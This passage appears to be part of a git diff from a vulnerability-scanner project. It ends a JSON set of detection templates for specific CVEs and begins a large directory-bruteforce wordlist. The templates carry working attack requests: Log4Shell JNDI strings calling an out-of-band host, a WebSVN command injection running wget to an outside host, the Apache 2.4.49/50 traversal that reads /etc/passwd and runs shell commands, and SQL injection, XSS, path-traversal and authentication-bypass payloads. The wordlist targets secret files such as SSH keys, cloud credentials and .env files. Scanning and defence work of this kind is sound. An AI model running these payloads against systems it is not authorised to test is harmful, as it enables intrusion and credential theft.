${jndi:ldap://127.0.0.1#.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://127.0.0.1#.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.{{interactsh-url}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":null},{"type":"regex","group":2,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]},{"type":"regex","group":1,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-46005","info":{"name":"Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nusername={{username}}&password={{password}}&login=\n","POST /admin/post-avehical.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicletitle\"\n\nTest\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"brandname\"\n\n1\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicalorcview\"\n\n</script><script>alert(document.domain)</script>\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"priceperday\"\n\n500\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"fueltype\"\n\nPetrol\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"modelyear\"\n\n2022\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"seatingcapacity\"\n\n5\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img1\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img2\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img3\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img4\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img5\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"submit\"\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv--\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32305","info":{"name":"Websvn <2.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-25028","info":{"name":"WordPress Event Tickets < 5.2.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-24849","info":{"name":"WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"WCFM Marketplace - Best Multivendor Marketplace for WooCommerce\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{post_data}}\n"],"payloads":{"post_data":["action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--","action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(header, \"application/json\")","contains(body, \"success\")"],"condition":"and"}]}]},{"id":"CVE-2021-37304","info":{"name":"Jeecg Boot <= 2.4.5 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/actuator/httptrace/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"traces\":[","\"headers\"","\"request\":{"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40970","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[username]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20090","info":{"name":"Buffalo WSR-2533DHPL2 - Path Traversal","severity":"critical"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["URLToken(cgi_path)","pppoe","wan"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35250","info":{"name":"SolarWinds Serv-U 15.3 - Directory Traversal","severity":"high"},"requests":[{"raw":["POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n/?Command=NOOP\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-32030","info":{"name":"ASUS GT-AC2900 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: asusrouter--\nReferer: {{BaseURL}}\nCookie: asus_token=\\0Invalid; clickedItem_tab=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["get_cfg_clientlist","alias","model_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27651","info":{"name":"Pega Infinity - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/prweb/PRAuth/app/default/"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.5.2', '>= 8.2.1')"]},{"type":"word","part":"body","words":["Pega Infinity"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"],"internal":true},{"type":"regex","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"]}]}]},{"id":"CVE-2021-28164","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/WEB-INF/web.xml"],"matchers":[{"type":"dsl","internal":true,"dsl":["!contains_all(body, '</web-app>', 'java.sun.com')","!contains_all(header, 'application/xml')","status_code != 200","status_code != 404"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/%2e/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body, '</web-app>', 'java.sun.com')","contains_all(header, 'application/xml')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-25063","info":{"name":"WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>' type='hidden"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25099","info":{"name":"WordPress GiveWP <2.17.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=give_checkout_login&form_id=xxxxxx\"><script>alert(document.domain)</script>\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"give_user_login\")"],"condition":"and"}]}]},{"id":"CVE-2021-32682","info":{"name":"elFinder 2.1.58 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/elfinder/elfinder-cke.html","{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html","{{BaseURL}}/assets/elFinder/elfinder.html","{{BaseURL}}/backend/elfinder/elfinder-cke.html","{{BaseURL}}/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html","{{BaseURL}}/uploads/elfinder/elfinder-cke.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["elfinder","php/connector"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31856","info":{"name":"Layer5 Meshery 0.5.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25120","info":{"name":"Easy Social Feed < 6.2.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'type' : '</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24358","info":{"name":"Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-42013","info":{"name":"Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n\n"],"stop-at-first-match":true,"unsafe":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-42013"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2004-0519","info":{"name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2004-1965","info":{"name":"Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]}]}
\ No newline at end of file
diff --git a/db/db.tar.zst b/db/db.tar.zst
new file mode 100644
index 0000000..b121348
Binary files /dev/null and b/db/db.tar.zst differ
diff --git a/db/directory-bruteforces.txt b/db/directory-bruteforces.txt
new file mode 100644
index 0000000..c854e36
--- /dev/null
+++ b/db/directory-bruteforces.txt
@@ -0,0 +1,5331 @@
+!.gitignore
+!.htaccess
+!.htpasswd
+%20../
+%2e%2e//google.com
+%2e%2e;test/
+%3f/
+%C0%AE%C0%AE%C0%AF
+%ff/
+..;/
+.7z
+.access
+.addressbook
+.adm
+.admin
+.apache.env
+.apdisk
+.AppleDB
+.AppleDesktop
+.AppleDouble
+.apt_generated/
+.architect
+.aws/credentials
+.axoCover/
+.babelrc
+.backup
+.bak
+.bash_history
+.bash_logout
+.bash_profile
+.bashrc
+.bower-cache
+.bower-registry
+.bower-tmp
+.bower.json
+.build/
+.buildpacks
+.buildpath
+.buildpath/
+.builds
+.bundle
+.bundle/
+.byebug_history
+.bz2
+.bzr/
+.bzr/README
+.c9/
+.c9revisions/
+.cabal-sandbox/
+.cache
+.cache/
+.canna
+.capistrano
+.capistrano/
+.capistrano/metrics
+.capistrano/metrics/
+.cask
+.cc-ban.txt
+.cc-ban.txt.bak
+.cfg
+.cfignore
+.checkstyle
+.circleci/
+.circleci/.firebase.secrets.json
+.circleci/.firebase.secrets.json.enc
+.circleci/config.yml
+.classpath
+.cobalt
+.codeclimate.yml
+.codeintel
+.codekit-cache
+.codio
+.coffee_history
+.compile
+.composer
+.concrete/DEV_MODE
+.conf
+.config
+.config.php.swp
+.config/
+.config/filezilla/sitemanager.xml.xml
+.config/psi+/profiles/default/accounts.xml
+.configuration.php.swp
+.consulo/
+.contracts
+.coq-native/
+.core
+.coverage
+.cpan
+.cpanel/
+.cpcache/
+.cproject
+.cr/
+.csdp.cache
+.cshrc
+.CSV
+.csv
+.CVS
+.cvs
+.cvsignore
+.dart_tool/
+.dat
+.database.env
+.db.env
+.db.xml
+.db.yaml
+.debug.env
+.deployignore
+.dev/
+.devcontainer
+.directory
+.django.env
+.dockerignore
+.drone.yml
+.DS_Store
+.dub
+.dump
+.eclipse
+.editorconfig
+.eggs/
+.elastic.env
+.elasticbeanstalk/
+.elb
+.elc
+.emacs
+.emacs.desktop
+.emacs.desktop.lock
+.empty-folder
+.env
+.env.backup
+.env.bak
+.env.copy
+.env.dev
+.env.dev.local
+.env.development
+.env.development.local
+.env.development.sample
+.env.docker
+.env.docker.dev
+.env.local
+.env.new
+.env.php
+.env.prod
+.env.prod.local
+.env.production
+.env.production.local
+.env.remote
+.env.sample.php
+.env.staging
+.env.test.sample
+.environment
+.error_log
+.eslintcache
+.eslintignore
+.eslintrc
+.espressostorage
+.eunit
+.external/
+.external/data
+.externalNativeBuild
+.externalToolBuilders/
+.fake/
+.FBCIndex
+.fetch
+.fhp
+.filemgr-tmp
+.filezilla/
+.filezilla/sitemanager.xml.xml
+.fishsrv.pl
+.flac
+.flowconfig
+.fontconfig/
+.fontcustom-manifest.json
+.forward
+.ftp
+.ftp-access
+.ftppass
+.ftpquota
+.gem
+.gfclient/
+.gfclient/pass
+.git
+.git-credentials
+.git-rewrite/
+.git/
+.git/config
+.git/HEAD
+.git/index
+.git/logs/
+.git/logs/HEAD
+.git/logs/refs
+.git2/
+.git_release
+.gitattributes
+.gitconfig
+.gitignore
+.gitignore.swp
+.gitignore_global
+.gitignore~
+.gitk
+.gitkeep
+.gitlab
+.gitlab-ci.yml
+.gitlab/issue_templates
+.gitlab/merge_request_templates
+.gitlab/route-map.yml
+.gitmodules
+.gitreview
+.gradle
+.gradle/
+.gradletasknamecache
+.grunt
+.grunt/
+.gtkrc
+.guile_history
+.gwt-tmp/
+.gwt/
+.gz
+.hash
+.hg
+.hg/
+.hg/dirstate
+.hg/requires
+.hg/store/data/
+.hg/store/undo
+.hg/undo.dirstate
+.hgignore
+.hgignore.global
+.hgrc
+.histfile
+.history
+.hpc
+.hsenv
+.ht_wsr.txt
+.hta
+.htaccess
+.htaccess-dev
+.htaccess-local
+.htaccess-marco
+.htaccess.BAK
+.htaccess.bak
+.htaccess.bak1
+.htaccess.old
+.htaccess.orig
+.htaccess.sample
+.htaccess.save
+.htaccess.txt
+.htaccess_extra
+.htaccess_orig
+.htaccess_sc
+.htaccessBAK
+.htaccessOLD
+.htaccessOLD2
+.htaccess~
+.HTF/
+.htgroup
+.htpasswd
+.htpasswd-old
+.htpasswd_test
+.htpasswds
+.httr-oauth
+.htusers
+.hypothesis/
+.idea
+.idea/
+.idea/.name
+.idea/caches
+.idea/compiler.xml
+.idea/copyright/profiles_settings.xml
+.idea/dataSources.ids
+.idea/dataSources.local.xml
+.idea/dataSources.xml
+.idea/deployment.xml
+.idea/dictionaries
+.idea/drush_stats.iml
+.idea/encodings.xml
+.idea/gradle.xml
+.idea/libraries
+.idea/misc.xml
+.idea/modules.xml
+.idea/scopes/scope_settings.xml
+.idea/Sites.iml
+.idea/sqlDataSources.xml
+.idea/tasks.xml
+.idea/uiDesigner.xml
+.idea/vcs.xml
+.idea/WebServers.xml
+.idea/woaWordpress.iml
+.idea/workspace(2).xml
+.idea/workspace(3).xml
+.idea/workspace(4).xml
+.idea/workspace(5).xml
+.idea/workspace(6).xml
+.idea/workspace(7).xml
+.idea/workspace.xml
+.idea0/
+.idea_modules/
+.ignore
+.ignored/
+.import/
+.influx_history
+.ini
+.inst/
+.install/
+.install/composer.phar
+.installed.cfg
+.ipynb_checkpoints
+.jekyll-cache/
+.jekyll-metadata
+.jestrc
+.joe_state
+.jpilot
+.jscsrc
+.jshintignore
+.jshintrc
+.jsp
+.JustCode
+.kde
+.keep
+.keys.yml
+.kitchen.local.yml
+.kitchen.yml
+.kitchen/
+.komodotools
+.komodotools/
+.ksh_history
+.laravel.env
+.last_cover_stats
+.lein-deps-sum
+.lein-failures
+.lein-plugins/
+.lein-repl-history
+.lesshst
+.lia.cache
+.libs/
+.lighttpd.conf
+.listing
+.listings
+.loadpath
+.LOCAL
+.local
+.localcache/
+.localeapp/
+.localsettings.php.swp
+.lock-wscript
+.log
+.log.txt
+.login
+.login_conf
+.LSOverride
+.lynx_cookies
+.m2/settings.xml
+.magentointel-cache/
+.mail_aliases
+.mailrc
+.maintenance
+.maintenance2
+.mc
+.mc/
+.members
+.memdump
+.mergesources.yml
+.merlin
+.meta
+.metadata
+.metadata/
+.metrics
+.modgit/
+.modman
+.modman/
+.modules
+.mono/
+.mr.developer.cfg
+.msi
+.mtj.tmp/
+.mvn/timing.properties
+.mweval_history
+.mwsql_history
+.mypy_cache/
+.mysql.env
+.mysql_history
+.nano_history
+.navigation/
+.nbproject/
+.netrc
+.netrwhist
+.next
+.nginx.env
+.nia.cache
+.nlia.cache
+.node_repl_history
+.nodelete
+.npm
+.npmignore
+.npmrc
+.nra.cache
+.nrepl-port
+.nsconfig
+.nsf
+.ntvs_analysis.dat
+.nuget/
+.nuget/packages.config
+.nyc_output
+.old
+.old.env
+.oldsnippets
+.oldstatic
+.org-id-locations
+.ost
+.packages
+.paket/
+.pass
+.passes
+.passwd
+.password
+.passwords
+.passwrd
+.patches/
+.pdf
+.perf
+.pgadmin3
+.pgpass
+.pgsql_history
+.php-ini
+.php-version
+.php_history
+.phpintel
+.phpstorm.meta.php
+.phptidy-cache
+.phpversion
+.pki
+.placeholder
+.postgres.env
+.powenv
+.pre-commit-config.yaml
+.procmailrc
+.production
+.profile
+.project
+.project.xml
+.project/
+.projectOptions
+.properties
+.psci
+.psci_modules
+.psql_history
+.psqlrc
+.pst
+.pub/
+.pwd
+.pydevproject
+.pylintrc
+.pytest_cache/
+.Python
+.python-eggs
+.python-history
+.python-version
+.qmake.cache
+.qmake.stash
+.qqestore/
+.Rapp.history
+.rar
+.raw
+.rbtp
+.RData
+.rdsTempFiles
+.rebar
+.rediscli_history
+.reek
+.remote
+.remote-sync.json
+.repl_history
+.revision
+.Rhistory
+.rhost
+.rhosts
+.robots.txt
+.rocketeer/
+.ropeproject
+.Rproj.user/
+.rspec
+.rsync-filter
+.rsync_cache
+.rsync_cache/
+.rubocop.yml
+.rubocop_todo.yml
+.ruby-gemset
+.ruby-version
+.rvmrc
+.s3backupstatus
+.sass-cache/
+.scala_history
+.sconsign.dblite
+.scrapy
+.scrutinizer.yml
+.selected_editor
+.settings
+.settings.php.swp
+.settings/
+.settings/.jsdtscope
+.settings/org.eclipse.core.resources.prefs
+.settings/org.eclipse.php.core.prefs
+.settings/org.eclipse.wst.common.project.facet.core.xml
+.settings/org.eclipse.wst.jsdt.ui.superType.container
+.settings/org.eclipse.wst.jsdt.ui.superType.name
+.sh
+.sh_history
+.shrc
+.sln
+.smileys
+.smushit-status
+.spamassassin
+.spyderproject
+.spyproject
+.sql
+.sql.bz2
+.sql.gz
+.sqlite_history
+.src/app.js
+.src/index.js
+.src/server.js
+.ssh
+.ssh.asp
+.ssh.php
+.ssh/
+.ssh/authorized_keys
+.ssh/id_dsa
+.ssh/id_rsa
+.ssh/id_rsa.key
+.ssh/id_rsa.key~
+.ssh/id_rsa.priv
+.ssh/id_rsa.priv~
+.ssh/id_rsa.pub
+.ssh/id_rsa.pub~
+.ssh/id_rsa~
+.ssh/know_hosts
+.ssh/know_hosts~
+.ssh/known_host
+.ssh/known_hosts
+.st_cache/
+.stack-work/
+.style.yapf
+.stylelintrc
+.sublime-gulp.cache
+.sublime-project
+.sublime-workspace
+.subversion
+.sucuriquarantine/
+.sunw
+.svn
+.svn/
+.svn/all-wcprops
+.svn/entries
+.svn/text-base/
+.svn/text-base/index.php.svn-base
+.svnignore
+.sw
+.swf
+.swo
+.swp
+.SyncID
+.SyncIgnore
+.synthquota
+.system/
+.tags
+.tar
+.tar.bz2
+.tar.gz
+.tconn/
+.tconn/tconn.conf
+.temp
+.temp/
+.texpadtmp
+.tfignore
+.tgitconfig
+.thumbs
+.tmp
+.tmp_versions/
+.tmproj
+.tox
+.tox/
+.transients_purge.log
+.Trash
+.Trashes
+.travis.yml
+.tx/
+.txt
+.user.ini
+.users
+.vacation.cache
+.vagrant
+.venv
+.version
+.vgextensions/
+.viminfo
+.vimrc
+.vs/
+.vscode
+.vscode/sftp.json
+.web
+.web-server-pid
+.web.env
+.webassets-cache
+.workspace/
+.wp-config.php.swp
+.www_acl
+.wwwacl
+.yardoc/
+.yarn-integrity
+.yo-rc.json
+.zeus.sock
+.zfs/
+.zip
+.zsh_history
+.zshrc
+/api-doc
+/api-docs
+/api.html
+/api.json
+/api.yaml
+/api.yml
+/api/2/explore/
+/api/docs
+/api/package_search/v4/documentation
+/api/swagger
+/api/swagger-resources
+/api/swagger-ui
+/api/swagger-ui.html
+/api/swagger.json
+/api/swagger.yaml
+/api/swagger.yml
+/api/swagger/v2/api-docs
+/api/swagger/v3/api-docs
+/api/v1/api-docs
+/api/v1/documentation
+/api/v2/api-docs
+/api/v2/documentation
+/api/v2/swagger.json
+/api/v3/api-docs
+/api/v3/documentation
+/api/v3/swagger.json
+/apidoc
+/apidocs
+/application
+/backoffice/v1/ui
+/build/reference/web-api/explore
+/classicapi/doc/
+/core/latest/swagger-ui/index.html
+/csp/gateway/slc/api/swagger-ui.html
+/doc
+/docs
+/documentation/swagger-ui
+/documentation/swagger-ui.html
+/documentation/swagger.json
+/documentation/swagger.yaml
+/documentation/swagger.yml
+/internal/docs
+/openapi.json
+/rest/v1
+/rest/v3/doc
+/swagger
+/swagger-resources
+/swagger-resources/configuration/security
+/swagger-resources/configuration/ui
+/swagger-ui.html
+/swagger-ui.html/v2/api-docs
+/swagger-ui.html/v3/api-docs
+/swagger-ui/
+/swagger-ui/index.html
+/swagger.json
+/swagger.yaml
+/swagger.yml
+/swagger/index.html
+/swagger/swagger-ui.html
+/swagger/v2/api-docs
+/swagger/v3/api-docs
+/swaggerui
+/ui
+/ui/
+/v1
+/v1.0
+/v1.1
+/v1.x/swagger-ui.html
+/v2
+/v2.0
+/v2/api-docs
+/v3
+/v3/api-docs
+0.htpasswd
+0.php
+0admin/
+0manager/
+1.7z
+1.htaccess
+1.htpasswd
+1.php
+1.rar
+1.sql
+1.tar
+1.tar.bz2
+1.tar.gz
+1.txt
+1.zip
+10-flannel.conf
+111.php
+123.php
+123.txt
+1c/
+1c_exchange.php
+2.php
+2.sql
+2.txt
+2010.sql
+2010.tar
+2010.tar.bz2
+2010.tar.gz
+2010.tgz
+2010.zip
+2011.sql
+2011.tar
+2011.tar.bz2
+2011.tar.gz
+2011.tgz
+2011.zip
+2012.sql
+2012.tar
+2012.tar.bz2
+2012.tar.gz
+2012.tgz
+2012.zip
